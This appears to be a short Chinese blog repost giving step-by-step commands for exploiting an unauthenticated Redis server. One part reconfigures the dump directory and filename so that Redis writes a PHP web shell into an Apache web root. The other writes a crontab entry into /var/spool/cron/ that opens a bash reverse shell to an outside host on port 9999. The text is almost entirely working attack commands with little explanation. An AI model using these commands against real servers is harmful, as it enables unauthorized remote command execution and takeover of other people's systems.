redis写入文件

来源:互联网 发布:mx anywhere2 软件 编辑:程序博客网 时间:2024/05/21 09:29
redis 10.10.3.215:6379> CONFIG SET dir /usr/share/apache/htdocs/ #这里是站点绝对路径 OK redis 10.10.3.215:6379> set shell "<?php echo system($_REQUEST[cmd])?>" OKredis 10.10.3.215:6379> CONFIG SET dbfilename shell.php OK redis 10.10.3.215:6379> save #将内存中的数据保存到dbfilename中  OK  redis 10.10.3.215:6379>

通过关闭配置项stop-writes-on-bgsave-error解决该问题。

redis 127.0.0.1:6379> config set stop-writes-on-bgsave-error no

可通过往定时任务中写入代码,实现shell反弹,或者写webshell
redis未授权登录服务器

1、telnet登录/也可以redis-cli登录

telnet 192.168.236.130 6379 //未授权登录config set dir /var/spool/cron/ //配置文件夹的路径(CONFIG SET 命令可以动态地调整 Redis 服务器的配置而(configuration)而无须重启。)//每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n" //直接往当前用户的crontab里写入反弹shell,换行是必不可少的。
原创粉丝点击